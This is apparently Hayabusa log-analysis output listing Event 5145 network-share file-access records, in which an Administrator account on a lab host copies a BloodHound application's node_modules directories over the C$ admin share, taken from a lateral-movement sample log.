2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
